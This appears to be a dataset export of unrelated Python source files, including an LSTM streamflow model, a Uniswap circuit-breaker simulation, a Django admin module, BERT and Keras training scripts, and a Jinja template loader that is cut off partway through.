import waterQuality, wqLinear, wqRela\nfrom hydroDL import kPath\nfrom hydroDL.model import trainTS\nfrom hydroDL.data import gageII, usgs, gridMET, transform\nfrom hydroDL.post import axplot, figplot\n\nimport torch\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nfrom hydroDL.model import rnn, crit\nimport os\n\nsiteNo = '01434025'\n# siteNo = '01364959'\ncodeLst = ['00915', '00940', '00955']\n\nvarX = gridMET.varLst\nvarY = ['00060']\ndfX = waterQuality.readSiteX(siteNo, varX)\ndfY = waterQuality.readSiteY(siteNo, varY)\n\nmtdX = waterQuality.extractVarMtd(varX)\nnormX, statX = transform.transInAll(dfX.values, mtdX)\ndfXN = pd.DataFrame(data=normX, index=dfX.index, columns=dfX.columns)\nmtdY = waterQuality.extractVarMtd(varY)\nnormY, statY = transform.transInAll(dfY.values, mtdY)\ndfYN = pd.DataFrame(data=normY, index=dfY.index, columns=dfY.columns)\n\nmatX1 = dfXN[dfXN.index < np.datetime64('2000-01-01')].values\nmatY1 = dfYN[dfYN.index < np.datetime64('2000-01-01')].values\nmatX2 = dfXN[dfXN.index >= np.datetime64('2000-01-01')].values\nmatY2 = dfYN[dfYN.index >= np.datetime64('2000-01-01')].values\nmatX = dfXN.values\nmatY = dfYN.values\n\nnx = len(varX)\nny = len(varY)\nind1 = np.where(~np.isnan(matY1))[0]\nind2 = np.where(~np.isnan(matY2))[0]\nrho = 365\nrhoF = 365\nind1 = ind1[ind1 > rho+rhoF]\n\nnh = 512\nns = 50\nimportlib.reload(rnn)\nmodel = rnn.AgeLSTM(nx=nx, ny=1, nh=nh).cuda()\noptim = torch.optim.Adadelta(model.parameters())\nlossFun = crit.RmseLoss().cuda()\n# train\nmodel.train()\nfor i in range(200):\n t0 = time.time()\n x = np.ndarray([rho+rhoF, ns, nx])\n y = np.ndarray([rho+rhoF, ns, ny])\n for k in range(ns):\n ind = ind1[np.random.randint(len(ind1))]\n x[:, k, :] = matX1[ind-rho-rhoF:ind, :]\n y[:, k, :] = matY1[ind-rho-rhoF:ind, :]\n xx = torch.from_numpy(x).float().cuda()\n yy = torch.from_numpy(y).float().cuda()\n if i == 0:\n try:\n model(xx)\n except:\n pass\n z = model(xx)\n loss = lossFun(z, yy)\n loss.backward()\n optim.step()\n model.zero_grad()\n print('{},{:.3f},{:.3f}'.format(i, loss, time.time()-t0))\n\ntorch.cuda.empty_cache()\n\n# test\nmodel = model.train(mode=False)\n\nxx = torch.from_numpy(matX[:, None, :]).float()\nxxCuda = xx.cuda()\nz2 = model(xxCuda)\n\nfig, ax = plt.subplots(1, 1)\nax.plot(z2.detach().cpu().numpy().flatten(), '-b')\nax.plot(matY, '-r')\nfig.show()\n","sub_path":"app/waterQual/modelNew/tempLSTM.py","file_name":"tempLSTM.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390344499","text":"from math import floor\n\nfrom uniswap import Uniswap\n\n\n\"\"\"Circuit Breaker\n# Algorithmical Arbitrager\n# Protocol\n# Run at critical moment(s)\n\"\"\"\n\n\nclass Uniswap_with_CB(Uniswap):\n def __init__(self,\n address,\n amount_Gwei, # ex) (1.) * n\n amount_GAS, # ex) (200. ~= 199.5) * n\n init_LT,\n fee=0.003, # 0.3%\n CB_mode=\"swap\", # \"swap\", \"pause\", \"nothing\"\n threshold=0.05 # 5%\n ):\n\n self.Gwei, self.GAS, self.LT = amount_Gwei, amount_GAS, init_LT\n self.k = self.Gwei * self.GAS # constant product\n self.fee = fee\n\n self.LT_holders = {}\n self.LT_holders[address] = init_LT\n\n self.CB_mode = CB_mode\n self.threshold = threshold\n\n \"\"\"Logging\"\"\"\n self.low, self.high, self.normal = 0, 0, 0\n\n def update_mode(self, new_mode):\n self.CB_mode = new_mode\n\n def update_threshold(self, new_threshold):\n self.threshold = new_threshold\n\n \"\"\"Circuit Breaker\"\"\"\n\n # def set_threshold(self, threshold):\n # self.threshold = threshold\n\n def _swap_GAS_to_Gwei(self, oracle_ratio, pool_ratio):\n # Burn GAS & Mint ETH(Gwei)\n delta_Gwei = floor((self.GAS - self.Gwei * oracle_ratio) / (oracle_ratio + pool_ratio))\n Gwei_prime = self.Gwei + delta_Gwei\n GAS_prime = floor(self.GAS - delta_Gwei * pool_ratio)\n\n self._update(Gwei_prime, GAS_prime)\n\n def _swap_Gwei_to_GAS(self, oracle_ratio, pool_ratio):\n # Burn ETH(Gwei) & Mint GAS\n delta_Gwei = floor((self.Gwei * oracle_ratio - self.GAS) / (oracle_ratio + pool_ratio))\n Gwei_prime = self.Gwei - delta_Gwei\n GAS_prime = floor(self.GAS + delta_Gwei * pool_ratio)\n\n self._update(Gwei_prime, GAS_prime)\n\n def _cb_swap(self, oracle_ratio, pool_ratio):\n if pool_ratio > oracle_ratio:\n self._swap_GAS_to_Gwei(oracle_ratio, pool_ratio)\n elif pool_ratio < oracle_ratio:\n self._swap_Gwei_to_GAS(oracle_ratio, pool_ratio)\n\n return\n\n def _cb_pause(self):\n return\n\n def _cb_nothing(self):\n return\n\n def _cb(self, oracle_ratio, pool_ratio):\n if self.CB_mode == \"swap\":\n return self._cb_swap(oracle_ratio, pool_ratio)\n elif self.CB_mode == \"pause\":\n return self._cb_pause()\n else: # nothing\n return self._cb_nothing()\n\n def circuit_break(self, oracle_ratio):\n pool_ratio = float(self.GAS / self.Gwei)\n\n # TODO: Dynamic Circuit Breaker (DCB)\n if (pool_ratio * (1. - self.threshold) >= oracle_ratio):\n # print(\"pool_ratio is too high\")\n self.high += 1\n self._cb(oracle_ratio, pool_ratio)\n return 1 # high\n elif (pool_ratio * (1. + self.threshold) <= oracle_ratio):\n # print(\"pool_ratio is too low\")\n self.low += 1\n self._cb(oracle_ratio, pool_ratio)\n return -1 # low\n else:\n # print(\"no problem\")\n self.normal += 1\n return 0 # same\n\n\nif __name__ == \"__main__\":\n import random\n import matplotlib.pyplot as plt\n\n random.seed(12345)\n # random.seed(950327)\n\n \"\"\"init\"\"\"\n us = Uniswap_with_CB('-1', 100000, 20000000, 1000000,\n CB_mode=\"swap\", threshold=0.05) # 1:200\n us.print_pool_state(bool_LT=True)\n\n \"\"\"Providing Liquidity\"\"\"\n print(us.join('0', 2000, 400001))\n us.print_pool_state(bool_LT=True)\n us.circuit_break(oracle_ratio=200.)\n\n \"\"\"Txs\"\"\"\n nRounds = 100000\n\n highs, lows = [], []\n Gweis, GASs = [], []\n\n for i in range(nRounds):\n if random.random() < 0.5:\n us.Gwei_to_GAS(10)\n else:\n us.GAS_to_Gwei_exact(10)\n\n cb = us.circuit_break(oracle_ratio=200.)\n\n \"\"\"log\"\"\"\n if cb == 1:\n highs.append(i)\n elif cb == -1:\n lows.append(i)\n\n Gweis.append(us.Gwei)\n GASs.append(us.GAS)\n\n us.print_pool_state(bool_LT=False)\n print(us.low, us.high, us.normal)\n\n \"\"\"Removing Liquidity\"\"\"\n print(us.out('0', 20000)) # The LT holder takes extra fees\n us.print_pool_state(bool_LT=True)\n\n \"\"\"Plot\"\"\"\n fig, ax1 = plt.subplots()\n\n ax1.plot([i for i in range(nRounds)], Gweis, 'b-')\n ax1.set_xlabel('round')\n ax1.set_ylabel('Gwei', color='b')\n ax1.tick_params('y', colors='b')\n\n ax2 = ax1.twinx()\n ax2.plot([i for i in range(nRounds)], GASs, 'r-')\n ax2.set_ylabel('GAS', color='r')\n ax2.tick_params('y', colors='r')\n\n for i in range(len(highs)):\n plt.axvline(x=highs[i], color='black', linestyle='-', linewidth=2)\n\n for i in range(len(lows)):\n plt.axvline(x=lows[i], color='gray', linestyle=':', linewidth=2)\n\n plt.show()\n","sub_path":"src/circuitbreaker.py","file_name":"circuitbreaker.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187534114","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on Wed Jul 31 2019\n\n@author: naokoIida\n\"\"\"\nimport sys\nimport os\n\nfo = sys.argv[1]\n\nif not os.path.exists('alterativeSJ_fil_annot'):\n os.mkdir('alterativeSJ_fil_annot')\nif not os.path.exists('alterativeSJ_fil_annot/'+fo):\n os.mkdir('alterativeSJ_fil_annot/'+fo)\nif not os.path.exists('alterativeSJ_assadjfreq'):\n os.mkdir('alterativeSJ_assadjfreq')\nif not os.path.exists('alterativeSJ_assadjfreq/'+fo):\n os.mkdir('alterativeSJ_assadjfreq/'+fo)\nif not os.path.exists('alterativeSJ_tabixAI'):\n os.mkdir('alterativeSJ_tabixAI')\nif not os.path.exists('alterativeSJ_tabixAI/'+fo):\n os.mkdir('alterativeSJ_tabixAI/'+fo)\nif not os.path.exists('alterativeSJ_cmut'):\n os.mkdir('alterativeSJ_cmut')\nif not os.path.exists('alterativeSJ_cmut/'+fo):\n os.mkdir('alterativeSJ_cmut/'+fo)\n \n","sub_path":"juncmut_env.py","file_name":"juncmut_env.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"324665710","text":"# coding=utf-8\n\n\"\"\"\n\nCellSamples Admin\n\n\"\"\"\n\nfrom django.contrib import admin\nfrom cellsamples.resource import CellSampleResource\nfrom mps.base.admin import LockableAdmin\nfrom models import Organ, CellType, CellSubtype, Supplier, CellSample\n\n\nclass CellTypeAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('cell_name', 'organ')\n\n\nadmin.site.register(CellType, CellTypeAdmin)\n\n\nclass CellTypeInline(admin.TabularInline):\n model = CellType\n\n\nclass OrganAdmin(admin.ModelAdmin):\n save_on_top = True\n\n inlines = [CellTypeInline]\n\n\nadmin.site.register(Organ, OrganAdmin)\n\n\nclass CellSubtypeAdmin(admin.ModelAdmin):\n save_on_top = True\n\n\nadmin.site.register(CellSubtype, CellSubtypeAdmin)\n\n\nclass CellSampleAdmin(LockableAdmin):\n\n resource_class = CellSampleResource\n \n save_on_top = True\n\n list_display = ('__unicode__', # calls CellSample.__unicode__ function\n 'supplier',\n 'receipt_date',\n 'barcode',\n 'locked')\n\n search_fields = ['cell_type__cell_type',\n 'cell_type__cell_subtype__cell_subtype',\n 'cell_source',\n 'supplier__name',\n 'barcode',\n 'product_id']\n save_as = True\n fieldsets = (\n (None, {\n 'fields': (('locked',\n 'cell_type'),\n ('cell_source',\n 'receipt_date'),\n ('cell_image'),\n ('notes'),)\n }),\n ('Supplier Information', {\n 'fields': (('supplier', 'product_id', 'barcode'),)\n }),\n ('Patient Information', {\n 'fields': (('patient_age', 'patient_gender',\n 'patient_condition'),)\n }),\n ('Isolation Information', {\n 'fields': (('isolation_datetime'), ('isolation_method',\n 'isolation_notes'),)\n }),\n ('Cell Viability', {\n 'fields': (('viable_count',\n 'viable_count_unit',\n 'percent_viability'),)\n }),\n ('Change Tracking', {\n 'fields': (('created_by',\n 'created_on'),\n ('modified_by',\n 'modified_on'))\n }),\n )\n\n\nadmin.site.register(CellSample, CellSampleAdmin)\n\n\nclass SupplierAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('name', 'phone', 'address')\n\n\nadmin.site.register(Supplier, SupplierAdmin)\n","sub_path":"cellsamples/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210194973","text":"#------------------------------------------------------------------------------\n# Mach-8: The Virtual Machinery Playpen \n#\n# blackchip.org, Inspired by the Vintage Computer Club. \n# All rites reversed (K) 2011, Reprint what you like.\n#\n# $Id: test_yap.py 130 2012-01-28 02:16:54Z mcgann $\n#------------------------------------------------------------------------------\nfrom mach8.yap import * \nfrom mach8_test import suite\nimport mach8_test.harness.yap\n\nclass TestPrint(mach8_test.harness.yap.TestHarness):\n \n def test_incomplete(self):\n suite.banner(self.test_incomplete) \n \n _; NEW()\n _; PRINTLN('Hello world')\n \n self.run_test() \n self.assertEquals('? Program incomplete error\\n', \n self.output.getvalue()) ","sub_path":"tests/mach8_test/unit/yap/test_yap.py","file_name":"test_yap.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368343585","text":"import sys\n\nsys.path.extend([\"../../\", \"../\", \"./\"])\nimport time\nimport torch.optim.lr_scheduler\nimport torch.nn as nn\nimport random\nimport argparse\nfrom driver.Config import *\nfrom model.BiLSTMModel import *\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nfrom model.BertModel import *\nfrom driver.SLHelper import *\nfrom data.Dataloader import *\nimport pickle\n\n\ndef train(data, dev_data, test_data, labeler, vocab, config):\n optimizers, schedulers = [], []\n\n optimizer_model = Optimizer(filter(lambda p: p.requires_grad, labeler.model.parameters()), config)\n optimizers.append(optimizer_model)\n\n if config.bert_tune == 1:\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in labeler.bert.named_parameters()\n if not any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay': 0.0},\n {'params': [p for n, p in labeler.bert.named_parameters()\n if any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay': 0.0}\n ]\n optimizer_bert = AdamW(optimizer_grouped_parameters, lr=5e-5, eps=1e-8)\n scheduler_bert = get_linear_schedule_with_warmup(optimizer_bert, num_warmup_steps=0,\n num_training_steps=4000)\n optimizers.append(optimizer_bert)\n schedulers.append(scheduler_bert)\n\n global_step = 0\n best_acc = 0\n batch_num = int(np.ceil(len(data) / float(config.train_batch_size)))\n update_freq = config.validate_every * config.update_every\n for iter in range(config.train_iters):\n start_time = time.time()\n print('Iteration: ' + str(iter) + ', total batch num: ' + str(batch_num))\n batch_iter = 0\n\n correct_num, total_num, loss_value = 0, 0, 0\n for onebatch in data_iter(data, config.train_batch_size, True):\n bert_inputs, predicts, masks, rels, heads, lengths, labels = \\\n batch_data_variable(onebatch, vocab)\n\n labeler.model.train()\n\n labeler.forward(bert_inputs, predicts, masks, rels, heads, lengths)\n loss = labeler.compute_loss(labels, masks)\n loss = loss / config.update_every\n loss_value += loss.item()\n loss.backward()\n\n cur_correct, cur_count = labeler.compute_accuracy(labels)\n correct_num += cur_correct\n total_num += cur_count\n acc = correct_num * 100.0 / total_num\n\n batch_iter += 1\n if batch_iter % config.update_every == 0 or batch_iter == batch_num:\n nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, labeler.model.parameters()), \\\n max_norm=config.clip)\n if config.bert_tune == 1:\n nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, labeler.bert.parameters()), \\\n max_norm=config.clip)\n\n for optimizer in optimizers:\n optimizer.step()\n for scheduler in schedulers:\n scheduler.step()\n\n labeler.model.zero_grad()\n if config.bert_tune == 1:\n labeler.bert.zero_grad()\n\n during_time = float(time.time() - start_time)\n print(\"Step:%d, ACC:%.2f, Iter:%d, batch:%d, time:%.2f, loss:%.2f\" \\\n % (global_step, acc, iter, batch_iter, during_time, loss_value))\n loss_value = 0\n global_step += 1\n\n if batch_iter % update_freq == 0 or batch_iter == batch_num:\n tag_correct, tag_total, dev_tag_acc = \\\n evaluate(dev_data, labeler, vocab, config.dev_file + '.' + str(global_step))\n print(\"Dev: acc = %d/%d = %.2f\" % (tag_correct, tag_total, dev_tag_acc))\n\n tag_correct, tag_total, test_tag_acc = \\\n evaluate(test_data, labeler, vocab, config.test_file + '.' + str(global_step))\n print(\"Test: acc = %d/%d = %.2f\" % (tag_correct, tag_total, test_tag_acc))\n if dev_tag_acc > best_acc:\n print(\"Exceed best acc: history = %.2f, current = %.2f\" % (best_acc, dev_tag_acc))\n best_acc = dev_tag_acc\n if iter > config.save_after > 0:\n torch.save(labeler.model.state_dict(), config.save_model_path)\n\n\ndef evaluate(data, labeler, vocab, outputFile):\n start = time.time()\n labeler.model.eval()\n output = open(outputFile, 'w', encoding='utf-8')\n total_gold_entity_num, total_predict_entity_num, total_correct_entity_num = 0, 0, 0\n\n for onebatch in data_iter(data, config.test_batch_size, False):\n bert_inputs, predicts, masks, rels, heads, lengths, labels = \\\n batch_data_variable(onebatch, vocab)\n count = 0\n predict_labels = labeler.labeler(bert_inputs, predicts, masks, rels, heads, lengths)\n for result in batch_variable_inst(onebatch, predict_labels, vocab):\n printInstance(output, result)\n gold_entity_num, predict_entity_num, correct_entity_num = evalInstance(onebatch[count], result)\n total_gold_entity_num += gold_entity_num\n total_predict_entity_num += predict_entity_num\n total_correct_entity_num += correct_entity_num\n count += 1\n\n output.close()\n\n acc = total_correct_entity_num * 200.0 / (total_predict_entity_num + total_gold_entity_num)\n\n end = time.time()\n during_time = float(end - start)\n print(\"sentence num: %d, labeler time = %.2f \" % (len(data), during_time))\n\n return total_correct_entity_num, total_gold_entity_num, acc\n\n\nclass Optimizer:\n def __init__(self, parameter, config):\n self.optim = torch.optim.Adam(parameter, lr=config.learning_rate, betas=(config.beta_1, config.beta_2),\n eps=config.epsilon)\n decay, decay_step = config.decay, config.decay_steps\n l = lambda epoch: decay ** (epoch // decay_step)\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(self.optim, lr_lambda=l)\n\n def step(self):\n self.optim.step()\n self.schedule()\n self.optim.zero_grad()\n\n def schedule(self):\n self.scheduler.step()\n\n def zero_grad(self):\n self.optim.zero_grad()\n\n @property\n def lr(self):\n return self.scheduler.get_lr()\n\n\nif __name__ == '__main__':\n torch.manual_seed(666)\n torch.cuda.manual_seed(666)\n random.seed(666)\n np.random.seed(666)\n\n # gpu\n gpu = torch.cuda.is_available()\n print(\"GPU available: \", gpu)\n print(\"CuDNN: \\n\", torch.backends.cudnn.enabled)\n\n argparser = argparse.ArgumentParser()\n argparser.add_argument('--config_file', default='default.cfg')\n argparser.add_argument('--thread', default=1, type=int, help='thread num')\n argparser.add_argument('--gpu', default=-1, type=int, help='Use id of gpu, -1 if cpu.')\n\n args, extra_args = argparser.parse_known_args()\n config = Configurable(args.config_file, extra_args)\n torch.set_num_threads(args.thread)\n\n vocab = creat_vocab(config.train_file, config.bert_vocab_file, config.min_occur_count)\n pickle.dump(vocab, open(config.save_vocab_path, 'wb'))\n\n config.use_cuda = False\n gpu_id = -1\n if gpu and args.gpu >= 0:\n torch.cuda.set_device(args.gpu)\n config.use_cuda = True\n print(\"GPU ID: \", args.gpu)\n gpu_id = args.gpu\n\n bert = BertExtractor(config)\n\n model = BiLSTMModel(vocab, config, bert.bert_hidden_size, bert.bert_layers)\n if config.use_cuda:\n # torch.backends.cudnn.enabled = True\n model = model.cuda()\n bert = bert.cuda()\n\n labeler = SequenceLabeler(model, bert)\n\n data = read_corpus(config.train_file)\n dev_data = read_corpus(config.dev_file)\n test_data = read_corpus(config.test_file)\n\n train(data, dev_data, test_data, labeler, vocab, config)\n","sub_path":"sequence_labeling/SLBERTSYNTree/driver/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":8071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"315640973","text":"import keras\nimport numpy as np\n# get MSE from scikit_learn\nfrom sklearn.metrics import mean_squared_error\n\n# 1. 데이터 준비\nx = np.array(range(1,101))\ny = np.array(range(101,201))\nx_pred = np.array(range(101,121))\ny_true = np.array(range(201,221))\n\n# shuffle = True is default option.\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n x, y, random_state=99, shuffle=True,\n # x, y, shuffle = False,\n train_size=0.6,\n test_size=0.5\n)\n\n# make appropriate proportions\nx_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train, random_state=99, shuffle = True,\n # x_train, y_train, shuffle = False, \n train_size=0.78\n)\n\nprint(len(x_train))\nprint(x_train)\nprint(y_train)\nprint(len(x_val))\nprint(x_val)\nprint(len(x_test))\nprint(x_test)\n\n'''\nx_train = x[:60]\nx_val = x[60:80]\nx_test = x[80:]\n\ny_train = x[:60]\ny_val = x[60:80]\ny_test = x[80:]\n'''\n\n# 2. 모델 구성\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\n\nmodel.add(Dense(5, input_dim = 1))\nmodel.add(Dense(5, activation = 'relu'))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\n\n\n# model.add(Dense(50))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\nmodel.add(Dense(1))\n\n# 3. 훈련\nmodel.compile(loss='mse', optimizer='adam', metrics=['mse'])\nmodel.fit(x_train, y_train, epochs = 100, batch_size=1,\n validation_data = (x_val, y_val))\n\n# 4. 평가, 예측\nloss, mse = model.evaluate(x_test, y_test, batch_size=1)\nprint(f\"loss : {loss}, mse : {mse}\")\n\ny_pred = model.predict(x_pred)\nprint(f\"y_predict {y_pred}\")\n\n\n# RMSE 구하기\nfrom sklearn.metrics import mean_squared_error\ndef RMSE(y_true, y_predict):\n return np.sqrt(mean_squared_error(y_true, y_pred))\nprint(f\"RMSE : {RMSE(y_true, y_pred)}\")\n\n# R^2 구하기\nfrom sklearn.metrics import r2_score\nr2_y_pred = r2_score(y_true, y_pred)\nprint(f\"R2: {r2_y_pred}\")\n\n","sub_path":"keras/keras12_01_split.py","file_name":"keras12_01_split.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573536928","text":"#\n# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# Copyright (C) 2018-2021 UAVCAN Development Team \n# This software is distributed under the terms of the MIT License.\n#\nimport collections\nimport importlib\nimport logging\nimport pathlib\nimport typing\n\nimport pydsdl\n\nfrom ..lang._config import VersionReader\nfrom .jinja2 import BaseLoader, Environment, FileSystemLoader, PackageLoader, TemplateNotFound\n\nlogger = logging.getLogger(__name__)\n\n\nTEMPLATE_SUFFIX = \".j2\" #: The suffix expected for Jinja templates.\n\nDEFAULT_TEMPLATE_PATH = \"templates\"\n\n\n# +--------------------------------------------------------------------------------------------------------------------+\n# | LOADERS : DSDLTemplateLoader\n# +--------------------------------------------------------------------------------------------------------------------+\n\n\nclass DSDLTemplateLoader(BaseLoader):\n \"\"\"\n Nunavut's DSDL template loader is similar to a choice loader with a file-system loader\n first and a package loader as a fallback. The major difference is a DFS is performed\n on the type hierarchy of the type a template is being loaded for. So, for example,\n if no ``StructureType.j2`` template is found then this loader will look for a ``CompositeType.j2``\n and so on.\n\n :param Optional[List[Path]] templates_dirs: A list of directories to load templates from using a\n :class:`nunavut.jinja.jinja2.FileSystemLoader`. If ``None`` no filesystem loader is created.\n :param bool followlinks: Argument passed on to the :class:`nunavut.jinja.jinja2.FileSystemLoader` instance.\n :param Optional[str] package_name_for_templates: The name of the package to load templates from. If ``None``\n then no :class:`nunavut.jinja.jinja2.PackageLoader` is created.\n :param str builtin_template_path: The name of the package under the ``package_name_for_templates`` package to load\n templates from. This is ignored if ``package_name_for_templates`` is None.\n :param Any kwargs: Arguments forwarded to the :class:`jinja.jinja2.BaseLoader`.\n \"\"\"\n\n def __init__(\n self,\n templates_dirs: typing.Optional[typing.List[pathlib.Path]] = None,\n followlinks: bool = False,\n package_name_for_templates: typing.Optional[str] = None,\n builtin_template_path: str = DEFAULT_TEMPLATE_PATH,\n **kwargs: typing.Any\n ):\n super().__init__(**kwargs)\n self._type_to_template_lookup_cache = dict() # type: typing.Dict[pydsdl.Any, pathlib.Path]\n self._templates_package_name = None # type: typing.Optional[str]\n\n if templates_dirs is not None:\n for templates_dir_item in templates_dirs:\n if not pathlib.Path(templates_dir_item).exists:\n raise ValueError(\"Templates directory {} did not exist?\".format(templates_dir_item))\n logger.info(\"Loading templates from file system at {}\".format(templates_dirs))\n self._fsloader = FileSystemLoader((str(d) for d in templates_dirs), followlinks=followlinks)\n else:\n self._fsloader = None\n\n if package_name_for_templates is not None:\n logger.info(\"Loading templates from package {}.{}\".format(builtin_template_path, builtin_template_path))\n self._package_loader = PackageLoader(package_name_for_templates, package_path=builtin_template_path)\n self._templates_package_name = \"{}.{}\".format(package_name_for_templates, builtin_template_path)\n else:\n self._package_loader = None\n\n def get_source(\n self, environment: Environment, template: str\n ) -> typing.Tuple[typing.Any, str, typing.Callable[..., bool]]:\n if self._fsloader is not None:\n try:\n return typing.cast(\n typing.Tuple[typing.Any, str, typing.Callable[..., bool]],\n self._fsloader.get_source(environment, template),\n )\n except TemplateNotFound:\n if self._package_loader is None:\n raise\n if self._package_loader is not None:\n return typing.cast(\n typing.Tuple[typing.Any, str, typing.Callable[..., bool]],\n self._package_loader.get_source(environment, template),\n )\n raise TemplateNotFound(template)\n\n def list_templates(self) -> typing.Iterable[str]:\n \"\"\"\n Override of :meth:`BaseLoader.list_templates` that returns an aggregate of the filesystem loader and\n package loader templates.\n\n :return: A list of templates names (i.e. file stems) found by this Generator object.\n\n .. invisible-code-block: python\n\n from nunavut.jinja.loaders import DSDLTemplateLoader, TEMPLATE_SUFFIX\n\n template_loaders = DSDLTemplateLoader(package_name_for_templates='nunavut.lang.c')\n\n templates = template_loaders.list_templates()\n\n structure_type = None\n\n for template in templates:\n if template == 'StructureType' + TEMPLATE_SUFFIX:\n structure_type = template\n\n assert structure_type is not None\n\n \"\"\"\n files = []\n if self._fsloader is not None:\n files += self._filter_template_list_by_suffix(self._fsloader.list_templates())\n if self._package_loader is not None:\n files += self._filter_template_list_by_suffix(self._package_loader.list_templates())\n\n return files\n\n def get_template_sets(self) -> typing.List[typing.Tuple[str, str, typing.Tuple[int, int, int]]]:\n template_sets = [] # type: typing.List[typing.Tuple[str, str, typing.Tuple[int, int, int]]]\n if self._templates_package_name is not None:\n vr = VersionReader(self._templates_package_name)\n template_sets.append((\"package\", self._templates_package_name, vr.version))\n return template_sets\n\n def get_templates(self) -> typing.Iterable[pathlib.Path]:\n \"\"\"\n Enumerate all templates found in the templates path.\n :data:`~TEMPLATE_SUFFIX` as the suffix for the filename. This method differs from the :class:`BaseLoader`\n override of :meth:`BaseLoader.list_templates` in that it returns paths instead of just file name stems.\n\n :return: A list of paths to all templates found by this Generator object.\n\n .. invisible-code-block: python\n\n from nunavut.jinja.loaders import DSDLTemplateLoader, TEMPLATE_SUFFIX\n\n template_loaders = DSDLTemplateLoader(package_name_for_templates='nunavut.lang.c')\n\n templates = template_loaders.get_templates()\n\n structure_type = None\n\n for template in templates:\n if template.stem == 'StructureType':\n structure_type = template\n\n assert structure_type is not None\n assert structure_type.suffix == TEMPLATE_SUFFIX\n assert structure_type.exists()\n\n \"\"\"\n files = set()\n if self._fsloader is not None:\n for template_dir in self._fsloader.searchpath:\n for template in pathlib.Path(template_dir).glob(\"**/*{}\".format(TEMPLATE_SUFFIX)):\n files.add(template)\n if self._package_loader is not None and self._templates_package_name is not None:\n templates_module = importlib.import_module(self._templates_package_name)\n spec_perhaps = templates_module.__spec__\n file_perhaps = None # type: typing.Optional[str]\n if spec_perhaps is not None:\n file_perhaps = spec_perhaps.origin\n if file_perhaps is None or file_perhaps == \"builtin\":\n raise RuntimeError(\"Unknown template package origin?\")\n templates_base_path = pathlib.Path(file_perhaps).parent\n for t in self._package_loader.list_templates():\n files.add(templates_base_path / pathlib.Path(t))\n return sorted(files)\n\n def type_to_template(self, value_type: typing.Type) -> typing.Optional[pathlib.Path]:\n \"\"\"\n Given a type object, return a template used to generate code for the type.\n\n :return: a template or None if no template could be found for the given type.\n\n .. invisible-code-block: python\n from nunavut.jinja.loaders import DSDLTemplateLoader\n import pydsdl\n\n l = DSDLTemplateLoader(package_name_for_templates='nunavut.lang.py')\n template_name = l.type_to_template(pydsdl.StructureType)\n\n assert template_name is not None\n assert template_name.name == 'Any.j2'\n\n \"\"\"\n template_path = None\n if self._fsloader is not None:\n filtered_templates = self._filter_template_list_by_suffix(self._fsloader.list_templates())\n template_path = self._type_to_template_internal(\n value_type, dict(map(lambda x: (pathlib.Path(x).stem, pathlib.Path(x)), filtered_templates))\n )\n if template_path is None and self._package_loader is not None:\n filtered_templates = self._filter_template_list_by_suffix(self._package_loader.list_templates())\n template_path = self._type_to_template_internal(\n value_type, dict(map(lambda x: (pathlib.Path(x).stem, pathlib.Path(x)), filtered_templates))\n )\n\n return template_path\n\n # +----------------------------------------------------------------------------------------------------------------+\n # | PRIVATE\n # +----------------------------------------------------------------------------------------------------------------+\n @staticmethod\n def _filter_template_list_by_suffix(files: typing.List[str]) -> typing.List[str]:\n return [f for f in files if (pathlib.Path(f).suffix == TEMPLATE_SUFFIX)]\n\n def _type_to_template_internal(\n self, value_type: typing.Type, templates: typing.Mapping[str, pathlib.Path]\n ) -> typing.Optional[pathlib.Path]:\n search_queue = collections.deque() # type: typing.Deque[typing.Any]\n discovered = set() # type: typing.Set[typing.Any]\n search_queue.appendleft(value_type)\n template_path = None\n\n while len(search_queue) > 0:\n current_search_type = search_queue.pop()\n try:\n template_path = self._type_to_template_lookup_cache[current_search_type]\n break\n except KeyError:\n pass\n\n try:\n logging.debug(\n \"NunavutTemplateLoader.type_to_template for {}: considering {}...\".format(\n value_type.__name__, current_search_type.__name__\n )\n )\n template_path = templates[current_search_type.__name__]\n self._type_to_template_lookup_cache[current_search_type] = template_path\n break\n except KeyError:\n for base_type in current_search_type.__bases__:\n if base_type != object and base_type not in discovered:\n search_queue.appendleft(base_type)\n discovered.add(current_search_type)\n\n return 